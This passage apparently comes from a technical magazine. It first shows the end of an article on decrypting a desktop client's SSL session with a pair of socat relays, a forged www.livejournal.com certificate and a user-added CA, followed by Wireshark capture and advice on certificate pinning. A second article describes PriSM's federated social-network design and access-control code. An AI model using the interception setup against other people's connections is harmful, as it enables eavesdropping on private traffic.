Socat instance one:

spencersr@bigboote:~$ sudo socat -vvv \
    OPENSSL-LISTEN:443,verify=0,fork,key=www.livejournal.com-key.pem,certificate=www.livejournal.com-key.pem,cafile=Yoyodyne-cacert.pem \
    TCP4:10.1.0.1:8080,fork

Socat instance two:

spencersr@bigboote:~$ sudo socat -vvv \
    TCP-LISTEN:8080,fork \
    OPENSSL:208.93.0.128:443,verify=0,fork

Load up Logjam and the socat instances will start printing out the stream to the terminal (Listing 2).

Hurray! You should be dancing at this point. But wait, I mentioned using Wireshark before, didn't I?

Using Wireshark to Capture and View the Unencrypted Stream

Now it's time for the easy part. I'm going to assume that you are comfortable capturing packets in Wireshark and focus mainly on the filtering of the capture stream.

Since by default Wireshark captures all traffic we should set up a capture filter that only listens for packets on port 8080 of host 127.0.2.1 (Figure 4).

Once Logjam is run packets will start streaming in while Wireshark is recording (Figure 5).

What now?

This article is about viewing unencrypted data in an SSL session. Whatever your reverse engineering goal is, SSL is less of an obstacle now.
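As an added example (not part of the article), the following parser turns a socat -vvv dump like Listing 2 into structured data: it reassembles both directions of the exchange, decodes the HTTP request and response, and reads the LiveJournal flat response into a dictionary. The sample dump is constructed after Listing 2 with the challenge masked; the header pattern assumes socat's "direction timestamp length=N from=A to=B" line format.

```python
# Added example (not from the article): turning the socat -vvv dump of
# Listing 2 into structured data, the first step towards the "own client"
# the article aims for. socat prefixes each transferred block with a direction
# marker ("> " client to server, "< " server to client) and a header line,
# and writes each CR as the two characters "\r".
import re
from urllib.parse import parse_qs

HEADER_RE = re.compile(
    r"([<>]) (\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+length=(\d+) from=(\d+) to=(\d+)"
)

# Constructed after Listing 2; the challenge value is masked.
SAMPLE_DUMP = r"""> 2012/08/29 00:10:27.527184 length=209 from=0 to=208
POST /interface/flat HTTP/1.1\r
Host: www.livejournal.com\r
Content-Type: application/x-www-form-urlencoded\r
User-Agent: http://logjam.danga.com; martine@danga.com\r
Connection: Keep-Alive\r
Content-Length: 23\r
\r
> 2012/08/29 00:10:27.566184 length=23 from=209 to=231
ver=1&mode=getchallenge< 2012/08/29 00:10:29.551570 length=437 from=0 to=436
HTTP/1.1 200 OK\r
Server: GoatProxy 1.0\r
Content-Type: text/plain; charset=UTF-8\r
Connection: keep-alive\r
\r
auth_scheme
c0
challenge
c0:1346227200:656:60:xxxxxx:xxxxxxxxxxxxx
expire_time
1346227916
server_time
1346227856
success
OK
"""


def split_chunks(dump: str):
    """Return [(direction, raw_text)] for each block socat printed.

    A block may start on the same line as the previous block's last byte
    (see "getchallenge< 2012/..." above) when the data did not end in a newline.
    """
    heads = list(HEADER_RE.finditer(dump))
    chunks = []
    for i, m in enumerate(heads):
        end = heads[i + 1].start() if i + 1 < len(heads) else len(dump)
        text = dump[m.end():end]
        if text.startswith("\n"):       # the newline socat prints after its header
            text = text[1:]
        chunks.append((m.group(1), text))
    return chunks


def reassemble(dump: str) -> dict:
    """Concatenate blocks per direction and undo socat's "\r" escaping."""
    streams = {">": "", "<": ""}
    for direction, text in split_chunks(dump):
        streams[direction] += text.replace("\\r", "\r")
    return streams


def parse_http_message(raw: str):
    """Split one HTTP message into (start line, header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_flat_response(body: str) -> dict:
    """LiveJournal's flat interface answers with alternating key and value lines."""
    lines = body.strip("\n").split("\n")
    if len(lines) % 2:
        raise ValueError("flat response has a key without a value")
    return dict(zip(lines[0::2], lines[1::2]))


def decode_session(dump: str) -> dict:
    streams = reassemble(dump)
    req_line, req_headers, req_body = parse_http_message(streams[">"])
    if int(req_headers.get("content-length", len(req_body))) != len(req_body):
        raise ValueError("request body length does not match Content-Length")
    resp_line, _, resp_body = parse_http_message(streams["<"])
    return {
        "request_line": req_line,
        "request": {k: v[0] for k, v in parse_qs(req_body).items()},
        "response_line": resp_line,
        "response": parse_flat_response(resp_body),
    }
```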

Figure 4. Wireshark lo (loopback) interface capture window with capture filter "port 8080 and host 127.0.2.1"



How Can SSL be Secure if this Method is so Simple?

SSL and all of the variations of digests and ciphers contained within it are pretty reliably secure. One of the major areas this article focused on was the ability to fool a client by making it trust a new certificate authority.

If you are interested in securing your site or client software against this sort of spying I recommend not using an SSL certificate authority keyring or trust database that is easily modified by the user. Including an SSL server certificate in client software, encrypted and protected by a hard coded key somewhere in the binary, and requiring it for use on SSL connections using a hardened socket library will dramatically cut down on the looky-loo factor.
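The countermeasure just described, as an added Python example that is not from the article: the client carries its own copy of the server certificate as its sole trust anchor and also checks the peer's SHA-256 fingerprint, so a CA added to the system store as in Listing 1 buys a proxy nothing. The certificate path, the fingerprint and the DER sample bytes are placeholders.

```python
# Added example (not from the article): the countermeasure the passage
# describes. The client trusts only the server certificate that ships with
# it and additionally checks the peer's SHA-256 fingerprint, so a CA added to
# the system store (as with Yoyodyne-cacert above) never enters the decision.
# The certificate path, fingerprint and sample DER bytes are placeholders.
import hashlib
import hmac
import socket
import ssl

BUNDLED_CERT_PEM = "/path/to/bundled-server-cert.pem"   # placeholder path
PINNED_SHA256 = "<sha256 of the bundled certificate, hex>"  # placeholder pin


def cert_fingerprint(der_cert: bytes) -> str:
    """SHA-256 of the DER-encoded certificate, as lowercase hex."""
    return hashlib.sha256(der_cert).hexdigest()


def pin_matches(der_cert: bytes, pinned_sha256: str) -> bool:
    """Compare in constant time so the check leaks nothing about the pin."""
    return hmac.compare_digest(cert_fingerprint(der_cert), pinned_sha256.lower())


def build_pinned_context(bundled_cert_pem: str) -> ssl.SSLContext:
    """A TLS context whose only trust anchor is the bundled certificate.

    Nothing from /etc/ssl/certs is loaded, so a CA that a user (or the
    Listing 1 procedure) added there cannot vouch for a proxy's certificate.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)   # CERT_REQUIRED + hostname check
    ctx.load_verify_locations(cafile=bundled_cert_pem)
    # Let the bundled end-entity certificate itself terminate the chain
    # (Python 3.10+); otherwise OpenSSL insists on reaching a self-signed root.
    ctx.verify_flags |= ssl.VERIFY_X509_PARTIAL_CHAIN
    return ctx


def connect_pinned(host: str, port: int, pinned_sha256: str = PINNED_SHA256,
                   bundled_cert_pem: str = BUNDLED_CERT_PEM) -> ssl.SSLSocket:
    """Open a TLS connection that succeeds only against the pinned server."""
    ctx = build_pinned_context(bundled_cert_pem)
    raw = socket.create_connection((host, port), timeout=10)
    tls = ctx.wrap_socket(raw, server_hostname=host)   # chain check happens here
    der = tls.getpeercert(binary_form=True)
    if der is None or not pin_matches(der, pinned_sha256):  # second, independent check
        tls.close()
        raise ssl.SSLError(f"{host}: server certificate does not match the pin")
    return tls


# Constructed stand-ins for DER certificates so the pin logic can be exercised
# offline: "genuine" is what the client shipped with, "proxy" is what a
# socat/OpenSSL MITM signed by the new CA would present.
GENUINE_DER = b"\x30\x82\x01\x00-constructed-genuine-certificate-bytes"
PROXY_DER = b"\x30\x82\x01\x00-constructed-proxy-issued-certificate-bytes"


def demo() -> dict:
    pin = cert_fingerprint(GENUINE_DER)
    return {"genuine": pin_matches(GENUINE_DER, pin),
            "proxy": pin_matches(PROXY_DER, pin)}
```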

Conclusion

Thanks to how simple it is to add certificate authorities to most browsers, mobile devices, and custom client software, it's a trivial matter to pull back the curtain on SSL encrypted streams with the right tools.

Remember to thank your open source hacker friends.



Figure 5. Wireshark with captured unencrypted packets


SHANE R. SPENCER

Shane R. Spencer is based out of Anchorage, Alaska and has over 10 years of system administration and programming experience. Many of his projects are Python based and interface with external services that provide no usable API and communicate over HTTPS only.
How to Build a Framework for Organization-Oriented Social Networking: The PriSM Approach

The popularity of Online Social Networks (OSN) and social media highlights their potential to become the primary platform for communication in the workplace and to carry out business as well.



What you will learn...

• How to define, delegate and enforce access control rules in distributed web applications,

• How to take advantage of the REST protocol for data exchange,

• How to implement an HTTP Push.

What you should know...

• The Java programming language,

• Basic knowledge of the HTTP protocol,

• Basic knowledge of the REST model,

• Basic knowledge of GWT's client-server asynchronous communication model.



While they have already been successfully embraced for many public relations and promotion related activities, existing platforms like Facebook or Google+ do not (in their current form) fit the bill of a platform that can be leveraged for managing a business' communication, processes or workflows.

Drawbacks include the lack of flexibility in terms of customization and interoperability subject to intra- and inter-organizational needs, as well as ambiguities about the content ownership and flow of information over such third party platforms.

In this article, we present PriSM, a framework specifically designed and implemented to bring the social network communication experience to the workplace. This is achieved by realizing a simple, secure and scalable platform which eases both the access control policy management as well as its enforcement in a decentralized and delegated fashion, allowing flexible yet controlled intra- as well as inter-organizational interactions.

Online Social Networks: A new communication channel

Online interactions and communication have become an integral part of our daily life. The emergence of online social networks (OSN) and Web 2.0 technologies has further revolutionized our online activities and ingrained them into the rest of our life.

It is, thus, natural to utilize such an omnipresent paradigm for conducting work related activities as well. Nevertheless, the existing infrastructure for online social networking is unsuitable for it. Oftentimes organizations want to retain full control over their data and communication, including storing it within the organization's own perimeter/infrastructure, and hence would not use a third party OSN service. Furthermore, existing OSNs do not provide adequate flexibility to customize the deployment to fit the process and structural peculiarities of individual organizations. Additionally, akin to the use of email, which inter-operates in a decentralized fashion across different service providers while organizations often control both the logical (domain) and physical (servers) components, it would be desirable to support communication across autonomous social networks (to support inter-organizational interactions). While approaches to federate OSNs have been touted [1], their uptake among dominant OSN service providers has not occurred.

As a consequence of a combination of these reasons, and possibly others that we overlook here, we envision the need for a framework which allows the deployment of autonomous social networks that can be administered by and customized subject to the needs of individuals or organizations, along with the ability for communication across such autonomous deployments, supporting flexible, fine-grained and scalable access-control policies and their enforcement. In this article, we present the design and implementation of PriSM - Private Social Mesh, which brings our vision a step closer to reality by allowing the deployment of autonomous social networks (ASNs) over private clouds or servers (or even offering a private instantiation as a service), and creating a communication mesh to facilitate inter-ASN interactions.

PriSM: A Framework for Creating Social Meshes

We define a social mesh as a network of social networks, described next by borrowing some terminology from sociology. Figure 1 shows a simple instance of a Social Mesh.

PriSM models what we call a Social Mesh, which is a network interconnecting distinct Autonomous Social Networks (or ASN for short). An ASN is a communication channel officially used by an organization and which materializes the structure of the organization. The ASN must reflect both the organization's policies in terms of information flow and the permissions and roles of the users.

The information flow across different users of an ASN and across different ASNs is managed by means of circles. Namely, a circle consists of a group of users of the social mesh - called members - and a set of rules. The members of a circle have full access to the information - messages - associated with such a circle. On the other hand, a user who does not belong to the circle is granted access to the information according to the specified rules. The rules of a circle are managed by members who have been appointed to such a task. We call such members bosses.

Different types of circles are required in order to represent the different kinds of user groups and sharing needs which may exist. For instance, both circles representing the internal structure of complex organizations and other circles not directly mapping the formal structure of an organization are needed. We call circles materializing structures of an organization subdomains. Examples of subdomains may be departments of a university or branches of a company.

On the other hand, circles representing groups created for official purposes, but without a direct mapping into the organization's structure, are called public groups. As an example, a public group may be a team of users working on a specific project. The project itself may be handled by users belonging to different departments of the company, such as developers from the IT Department (a subdomain) and users from the Sales Department (another subdomain). Hence, the main feature characterizing a public group is the purpose for which it has been created.

Note that, despite the name "public group", information about the group (e.g., membership, content, access rights, etc.) does not actually need to be public; the name just indicates that anyone is allowed to create such ad-hoc groups, in contrast to subdomains, which are administered by individuals with specific (delegated) rights to do so. For instance, some ASNs may allow users to create and join public groups created for purposes not directly work-related, such as a group created to simplify the communication among the soccer-playing members of the IT Department. As opposed to subdomains, members of a public group may also belong to different ASNs, such as for a project carried out jointly by members of multiple organizations.

Moreover, PriSM allows users to define personalized circles called private groups in which users are categorized according to the preferences of the creator of the circle. Such private groups are strictly confidential to the creator of the circle, and, thus, unknown to the users who are categorized. Private groups provide a tool to control the flow of an individual's messages in a fine-grained manner (akin to the use of circles in Google+), for example specifying that a message is visible only to the users categorized into a specific private circle. As a more "concrete" example, consider a researcher working on a project crucial for the company. She/he may create a private group of "untrusted colleagues" to prevent such users from receiving messages exchanged within the research team.

Besides information flow, ASNs require a way to manage the privileges of their members. In the following we define as privileges the operations that a user is allowed to perform in an ASN. PriSM uses the roles assigned to users by the ASN administrator. In the presented model, a role is a job function/title within the organization with some associated semantics regarding the authority and responsibility conferred on a member of that role. We assume that a user may be associated with multiple roles, according to the functions she/he is performing within the organization. Additionally, PriSM allows the administrator to further refine the privileges available to a given user according to "where" she/he is operating. In fact the privileges granted to a given user at a given moment are defined by combining the roles to which the user has been assigned and the subdomain in which she/he is operating. Thus, the subdomains contribute to identifying the available privileges, refining the privileges of a role (both granting and revoking privileges) or even granting/revoking permissions directly to specific users.

Table 1. The group types defined in PriSM's model



Other than that, a group creator may be interested in restricting the membership of the group, for example not granting membership to those users who are members of another specific group. Furthermore, one may be willing to moderate the messages associated with a given group. PriSM provides the users the possibility to specify group privileges.

To simplify the management of circles and roles, PriSM allows, and suggests, that circles and roles be organized in a hierarchy. This way a circle will inherit the properties of its immediate parent, both with respect to information propagation rules and privileges.

Table 1 summarizes the characteristics of the groups discussed so far. Namely, it shows the properties of the different user groups defined in PriSM's social mesh model.
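The privilege rules described above (roles, subdomain-level grants and revokes per role and per user, and inheritance down the subdomain hierarchy), modelled as an added Python example that is not PriSM's code. Role, privilege and subdomain names are constructed, and the precedence (role refinements before per-user ones at each level, the nearest subdomain applied last) is an assumption about how the refinements combine.

```python
# Added example (not PriSM's code): a small model of the privilege rules the
# text describes. A user's privileges in a subdomain start from her roles, are
# refined by that subdomain's per-role and per-user grants and revokes, and a
# subdomain inherits the refinements of its parent. Names are constructed.
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional, Set

# Constructed role definitions: what a role grants everywhere in the ASN.
ROLE_PRIVILEGES: Dict[str, Set[str]] = {
    "employee": {"read", "post"},
    "manager": {"read", "post", "moderate", "invite"},
}


@dataclass
class Subdomain:
    name: str
    parent: Optional["Subdomain"] = None
    role_grants: Dict[str, Set[str]] = field(default_factory=dict)
    role_revokes: Dict[str, Set[str]] = field(default_factory=dict)
    user_grants: Dict[str, Set[str]] = field(default_factory=dict)
    user_revokes: Dict[str, Set[str]] = field(default_factory=dict)

    def lineage(self) -> List["Subdomain"]:
        """This subdomain and its ancestors, root first."""
        chain, node = [], self
        while node is not None:
            chain.append(node)
            node = node.parent
        return chain[::-1]


def effective_privileges(user: str, roles: Iterable[str], where: Subdomain) -> Set[str]:
    """Privileges of `user`, holding `roles`, while operating in `where`."""
    roles = list(roles)
    privs: Set[str] = set()
    for role in roles:
        privs |= ROLE_PRIVILEGES.get(role, set())
    # Assumed precedence: refinements are applied root first, so the subdomain
    # the user is actually in has the last word over anything inherited; at
    # each level role-wide rules come first and per-user rules last, so the
    # more specific rule wins.
    for node in where.lineage():
        for role in roles:
            privs |= node.role_grants.get(role, set())
        for role in roles:
            privs -= node.role_revokes.get(role, set())
        privs |= node.user_grants.get(user, set())
        privs -= node.user_revokes.get(user, set())
    return privs


def has_privilege(user: str, roles: Iterable[str], where: Subdomain, privilege: str) -> bool:
    return privilege in effective_privileges(user, roles, where)


def demo() -> Dict[str, Set[str]]:
    # Constructed hierarchy: Yoyodyne > IT > IT/Helpdesk, and Yoyodyne > Sales.
    company = Subdomain("Yoyodyne")
    it = Subdomain("IT", parent=company, role_grants={"employee": {"deploy"}})
    helpdesk = Subdomain("IT/Helpdesk", parent=it, user_revokes={"bob": {"deploy"}})
    sales = Subdomain("Sales", parent=company,
                      role_revokes={"employee": {"post"}},
                      user_grants={"alice": {"post"}})
    return {
        "bob@IT": effective_privileges("bob", ["employee"], it),
        "bob@IT/Helpdesk": effective_privileges("bob", ["employee"], helpdesk),
        "carol@IT/Helpdesk": effective_privileges("carol", ["employee"], helpdesk),
        "bob@Sales": effective_privileges("bob", ["employee"], sales),
        "alice@Sales": effective_privileges("alice", ["employee"], sales),
        "dave@Sales": effective_privileges("dave", ["employee", "manager"], sales),
    }
```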

Online social networks are not only characterized by how users can be arranged into groups but also by how it is possible to create relationships between users. In PriSM we chose a relationship model similar to the one implemented in Twitter and Google+ rather than the model used in Facebook. The main difference is that the relationships existing in Facebook are bidirectional, which means that if Alice is connected to Bob then Bob is also connected to Alice. On the other hand, in PriSM it is possible to create unidirectional relationships, which means that if Alice is interested in messages created by Bob but Bob is not interested in the messages created by Alice, then it is possible to create a relationship only from Alice to Bob and not vice versa. According to PriSM terminology we will refer to Alice as a fan of Bob and to Bob as an idol of Alice.

This type of relationship is very useful in several contexts where the communication model is not necessarily one-to-one or many-to-many but may instead be one-to-many. A simple example of such a communication model is in universities, where a professor creates messages which are interesting (or at least should be) for several students. On the other hand, the professor is not, in general, interested in the messages created by her/his students.

Other than that, PriSM supports one-to-one communications using personal messages. Likewise, many-to-many can also be realized in PriSM using groups.

PriSM Architecture and Implementation

Figure 2. PriSM architecture

In order to provide the services required by an ASN, each domain deploys PriSM locally. Figure 2 shows the architecture of an independent ASN deployment comprising several interconnected modules. Each module is in charge of managing a specific subset of the features provided by the system. Many of these features are 'standard' in any state-of-the-art on-line social network platform while a few others are novel, specific to PriSM's distributed/federated nature and its access and information flow controls:

• User Manager: This module provides an interface to the operations directly related to the users, such as registration, profile management, relations, subscription to messages from other users, etc.

• Circle Manager: This component controls the circle-related information, such as the lists of members and the propagation policies for each circle, as well as any relationships between circles.

• Access Control Manager: This module regulates the actions performed by the users of a PriSM ASN with respect to the privileges assigned to them by the domain's administrators, and enforces the policies defined in the circles.

• Content Manager: The functionalities of this module are:

  • to store and propagate the messages (and content) generated by the ASN's users and

  • to grant access only to those users who are allowed according to the rules.

The PriSM Web Interface exposes the services 
orchestrated by all these constituent modules to 
the ASN users. 

As shown in Figure 2, the PriSM architecture 
consists of another module, which manages the in- 
terconnections between the different ASN instanc- 
es of PriSM. 



Listing 1. Some methods of the client-side of the remote interface

    // Fragment of the client side of the remote interface. The field mapper is a
    // Jackson ObjectMapper; the HTTP calls use Apache HttpClient.
    public UserData getUserData(UserID uid) throws IOException {
        HttpResponse response = executeGet(String.format("http://%s/PriSM/remote/user/%s",
                uid.getDomain(), uid.getUsername()));
        if (2 == response.getStatusLine().getStatusCode() / 100) {
            // a 2xx answer carries the JSON encoding of a UserData object
            return mapper.readValue(response.getEntity().getContent(), UserData.class);
        } else {
            // handle the error accordingly to the returned status code.
            return null;
        }
    }

    protected HttpResponse executeGet(String urlQuery) throws IOException {
        HttpClient client = new DefaultHttpClient();
        HttpGet getRequest = new HttpGet(urlQuery);
        return client.execute(getRequest);
    }
Remote Interface

This module is in charge of performing the opera- 
tions of exchanging information with other ASNs. 
For example, the Remote Interface retrieves the 
required data when a user is accessing the profile 
of some user in some other domain. It also sends 
to the interested domains the updates involving 
shared data, such as those regarding the mem- 
bers and/or the policies of shared circles. 

The current implementation of PriSM can be downloaded from [7]. It is implemented in Java, using GWT [2] for the web-interface. The communication between the web-interface and the server is done by means of the mechanisms provided by the GWT framework.

On the other hand, the communication between the different PriSM modules and between different deployments is performed using the REST model [4]. The implementation is realized using three open-source libraries: HttpClient [4], Jersey [3] and Jackson [6].



We chose GWT as the principal framework for the development of our prototype for four main reasons:

• It allows Java programmers to develop efficient and user-friendly AJAX web-interfaces,

• GWT's developer kit is very well integrated with Eclipse, making the development and the testing of the application simpler for programmers,

• The JavaScript obtained from the compilation of the Java source code is optimized for a plethora of browsers, relieving the developer from that task and

• The generated code is very efficient and highly optimized [9].

HttpClient is a library that simplifies the creation of network communication using the HTTP protocol, which is one of the building blocks of the REST model. See Listing 1 for a brief example. We chose this library because of its stability and the ease of access to documentation and source code examples. HttpClient also simplifies the creation of PUT and POST requests by means of an easy-to-use interface for the management of the message body.

Listing 2. UserManagerService's server-side remote interface

    import java.io.InputStream;
    import javax.servlet.http.HttpServletRequest;
    import javax.ws.rs.*;
    import javax.ws.rs.core.Context;
    import javax.ws.rs.core.MediaType;
    import javax.ws.rs.core.Response;
    import com.sun.jersey.multipart.FormDataParam;

    // Jersey resource: the annotations bind each method to a path, an HTTP method
    // and a content type. The method bodies are omitted in the listing.
    @Path("/user/")
    public class User {

        @GET
        @Path("{username}")
        @Produces(MediaType.APPLICATION_JSON)
        public String getUserInfo(@PathParam("username") String username) {
            return null; // body omitted in the listing
        }

        @PUT
        @Path("{username}/fan")
        public Response addFan(@PathParam("username") String idolUsername,
                               @Context HttpServletRequest req) {
            return null; // body omitted in the listing
        }

        @DELETE
        @Path("{username}/fan/{fanusername}@{fandomain}")
        public void deleteFan(@PathParam("username") String username,
                              @PathParam("fanusername") String fanUsername,
                              @PathParam("fandomain") String fanDomain) {
            // body omitted in the listing
        }

        @POST
        @Path("img/{username}")
        @Consumes(MediaType.MULTIPART_FORM_DATA)
        @Produces(MediaType.TEXT_PLAIN)
        public String updateUserPicture(@PathParam("username") String username,
                                        @FormDataParam("picture") InputStream pictureStream) {
            return null; // body omitted in the listing
        }
    }

Regarding the request messages' body, we use JSON to encode the data exchanged between client and server. Thus, both the body of the request messages and the returned messages are encoded using JSON. We chose such a language for data exchange because its definition is less strict and it is also lightweight in comparison to other languages such as XML.

Considering that we are using the Java language, we could have used plain Java serialization to send and receive data between ASNs. We chose differently in order not to limit the implementation of other PriSM-compatible frameworks in different programming languages, such as C# or Ruby.

For our implementation, we are using the Jackson library to perform the conversion between POJO and JSON objects. As a matter of fact, the mapper variable in Listing 1 is exactly an instance of the ObjectMapper class from the Jackson library. On the client side we use the method readValue(InputStream is, Class<?> type) to deserialize the JSON object into the corresponding Java object.

On the server side, on the other hand, another instance of the ObjectMapper is used to serialize from Java objects to JSON objects. This is done by invoking the method writeValue(Object obj).

The server side of the remote interface has been implemented using Jersey. Jersey is an open-source library implementing the JSR-331, which is the reference specification for building RESTful Web services. It uses a series of annotations helping the developer to bind the methods of different classes to paths and HTTP methods. The actual interface between the user-defined classes and the web is performed by a Jersey Servlet, which configures itself to call the appropriate method for each incoming request.

Listing 2 shows the interface toward the UserManager module. In particular, it shows the annotations required to specify the paths, the HTTP methods and the content type associated with each Java method.

The present PriSM implementation allows communication only between ASNs which have been manually paired by the domains' administrators. Paired ASNs are considered trusted in the current model. Additionally, at present we assume the existence of a service to correctly discover other ASNs and their trustworthiness. These assumptions need further consideration in future. We would also like to note that individual ASN deployments are free to tweak the constituent modules, to add or modify functionalities as deemed appropriate.

Access Control, or How to Define Who Can 
do What 

PriSM supports what we call group and domain privileges. The former are those privileges defining the actions users can perform within a group, such as the privilege of joining the group, the privilege of tagging a message with the current group (which means associating the message with the group, thereby inheriting all the group's rules), or the requirement that messages tagged with a group be moderated by a boss of the group. The latter are those privileges granting users administrative powers, such as the privileges to create public circles, to create subdomains, to create roles and so on.

Group privileges are specific to the group for which they are defined, and therefore their enforcement is straightforward: once a user is operating in a specific group, the group privileges are applied.

Domain privileges, on the other hand, require a more complex mechanism to be enforced. Note that the PriSM framework manages and enforces access control at the ASN's level, in the sense that the domain privileges are defined in groups characteristic of an ASN - such as roles and subdomains - and they can be enforced only within the specific ASN.

The operations a user is granted to perform are defined by a combination of her/his roles and the subdomain in which she/he is operating. Because of that, the PriSM framework enforces access control differently according to the action performed by the user.

Figure 3. PriSM's access control model

Listing 3. The methods for the management of the users' privileges

    @Override
    public Set<Privilege> getRolesPrivileges(UserID userID) {
        // admin users will always have the full privileges
        if (userManager.isAdminUser(userID))
            return new HashSet<Privilege>(getPrivilegesList());

        Set<Privilege> privileges = new HashSet<Privilege>();
        try {
            // union of the privilege lists of every role the user belongs to
            List<CircleID> roles = circleManager.getRolesMembership(userID);
            for (CircleID role : roles) {
                try {
                    privileges.addAll(dataSource.getPrivileges(role, true));
                } catch (DataSourceException e) {
                    logger.error("Error retrieving the privileges for role " + role);
                }
            }
        } catch (DataSourceException e) {
            logger.error("Error retrieving the roles of user " + userID);
        }
        return privileges;
    }

    @Override
    public Set<Privilege> getActivePrivileges(Set<Privilege> rolePrivileges, CircleID circleID,
                                              UserID userID) {
        // work on a copy: the session-level role privileges are never modified
        Set<Privilege> activePrivileges = new HashSet<Privilege>(rolePrivileges);
        // admin users already have all privileges
        if (userManager.isAdminUser(userID))
            return activePrivileges;

        if (null != circleID) {
            try {
                PrivilegeCacheItem privileges = privilegesCache.getCache(circleID);
                // circle-wide grant/revoke lists, then per-user delegations
                activePrivileges.addAll(privileges.getGrant());
                activePrivileges.removeAll(privileges.getRevoke());

                if (null != privileges.getDelegationGrant(userID))
                    activePrivileges.addAll(privileges.getDelegationGrant(userID));

                if (null != privileges.getDelegationRevoke(userID))
                    activePrivileges.removeAll(privileges.getDelegationRevoke(userID));
            } catch (DataSourceException e) {
                logger.error("Error retrieving the privileges from the cache");
            }
        }
        return activePrivileges;
    }

Role-Based Access Control (RBAC for short) is a well-known and well-established access control model. In a few words, in RBAC the access control model maps the privileges to the roles existing within an organization and associates such collections of privileges to the users. Thus, privileges are not associated directly to users but by means of roles.

In PriSM we extended the RBAC model as shown in Figure 3. According to our model the privileges of a user are defined by the roles of the user combined with the privileges defined for the "context" in which the user is operating.

More precisely, we associate with each circle (which, we recall, is defined as a group of users and a set of rules defining how information is propagated) a set of privileges to be granted/revoked to the user.

To do that, we compute on the fly the list of available privileges each time the user changes location within the website. This is done by keeping the list of privileges from the roles as a session variable (which, we recall, is kept on the server) and each time the user accesses a location on the web-interface we update the list of active privileges. Listing 3 shows the actual code used to retrieve roles' active privileges. Note that the method getActivePrivileges() does not modify the list of roles' privileges but operates on a copy of such list. This way it is possible to keep one copy of the original list along the whole user's session, saving the time of querying the database again.

Moreover, retrieving the privileges of a circle from the database is a costly operation. To reduce such costs in PriSM we exploited two things. First of all, we store for each circle/role the privilege lists as serialized Java objects, thus saving the time required to build such lists from access control matrices, XML files or other kinds of serialization format. Secondly, we take advantage of a cache that stores the privileges associated with the most recently accessed circles, to further speed up the retrieval of such data.

Of course, we implemented an API to invalidate the appropriate cached and session data whenever a circle's or a role's privilege list is modified.
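The privilege computation just described, as an added illustration in Python rather than PriSM's own Java code: role privileges form the session-level set, the circle the user is operating in grants and revokes privileges and carries per-user delegations, and administrators bypass the whole mechanism. The role, user and circle data, the PrivilegeCache class and every name in it are constructed for this example and are not PriSM's schema or API.

```python
# Added illustration (not PriSM's code): extended RBAC where the circle the
# user is operating in acts as a "context" that grants/revokes privileges.
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, Optional, Set


@dataclass
class CirclePrivileges:
    """Privileges attached to one circle (assumed shape, not PriSM's schema)."""
    grant: Set[str] = field(default_factory=set)
    revoke: Set[str] = field(default_factory=set)
    delegation_grant: Dict[str, Set[str]] = field(default_factory=dict)   # per user
    delegation_revoke: Dict[str, Set[str]] = field(default_factory=dict)  # per user


ALL_PRIVILEGES: FrozenSet[str] = frozenset(
    {"post", "tag_message", "moderate", "create_circle", "create_role"})

# Constructed sample data for the example.
ROLE_PRIVILEGES = {"student": {"post"},
                   "professor": {"post", "tag_message", "moderate"}}
USER_ROLES = {"alice": {"professor"}, "bob": {"student"}, "root": set()}
ADMINS = {"root"}
CIRCLES = {
    "exam-board": CirclePrivileges(
        grant={"create_circle"},
        revoke={"post"},
        delegation_grant={"bob": {"moderate"}},
        delegation_revoke={"alice": {"moderate"}},
    ),
}


class PrivilegeCache:
    """Caches the privilege lists of recently used circles. invalidate() is the
    hook a circle update must call, otherwise stale grants keep being applied."""

    def __init__(self) -> None:
        self._items: Dict[str, CirclePrivileges] = {}
        self.misses = 0  # counts what would be database reads

    def get(self, circle_id: str) -> CirclePrivileges:
        if circle_id not in self._items:
            self.misses += 1
            self._items[circle_id] = CIRCLES[circle_id]
        return self._items[circle_id]

    def invalidate(self, circle_id: str) -> None:
        self._items.pop(circle_id, None)


def roles_privileges(user: str) -> FrozenSet[str]:
    """Session-level set: union of the privileges of the user's roles.
    Returned frozen so the session copy cannot be mutated by later steps."""
    if user in ADMINS:
        return ALL_PRIVILEGES
    privs: Set[str] = set()
    for role in USER_ROLES.get(user, set()):
        privs |= ROLE_PRIVILEGES.get(role, set())
    return frozenset(privs)


def active_privileges(role_privs: FrozenSet[str], circle_id: Optional[str],
                      user: str, cache: PrivilegeCache) -> Set[str]:
    """Apply the circle context to a copy of the role privileges, in the same
    order as Listing 3: grant, revoke, delegated grant, delegated revoke."""
    active = set(role_privs)
    if user in ADMINS or circle_id is None:
        return active
    ctx = cache.get(circle_id)
    active |= ctx.grant
    active -= ctx.revoke
    active |= ctx.delegation_grant.get(user, set())
    active -= ctx.delegation_revoke.get(user, set())
    return active
```

Because roles_privileges() returns a frozenset and active_privileges() works on a copy, the session-level set survives any number of context switches unchanged, which is why Listing 3 copies rolePrivileges before applying the circle's lists. The misses counter shows the cache hit after the first lookup and the re-read after invalidate(), the hook a circle update has to call.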

Information Flow Management, or Who 
Can Read One's Stuff 

As we mentioned in the introduction, one of the 
key features of PriSM is the possibility for a user to 



share messages with other users operating in dif- 
ferent organizations. We also mentioned that this 
is done while respecting the policies defined by the 
author of the message and the policies of the ad- 
ministrators of the domain to which the author be- 
longs. 

Before we present the implementation of the information flow mechanism, let us briefly describe how it works. We are not going into the details of the policy definition language; let us just define a policy as a formula of the form Pred1 & Pred2 & Pred3, where each Predi is a predicate verifying certain properties of the message or of the user reading the message.

The policies that have to be applied are chosen 
according to the tags of the message. 

According to the type of the circle the rules may 
be defined by different people. More precisely, by 
people with different roles within the organization. 

Recall that PriSM allows the classification of us- 
ers into different group types, each of them with 
a specific semantic. With respect to information 
propagation, we are interested only in such groups 
that are defined as circles, which means groups 
having associated propagation rules. Thus, we are 
interested only in such groups that are involved in 
the information propagation process. 

A message is associated with two sets of tags: the tag set and the conflict set. The former associates the message with the groups of users that are allowed to access it, while the latter defines the set of users that are denied access to the message.

A user who belongs to at least one of the circles in the tag set may read the message.

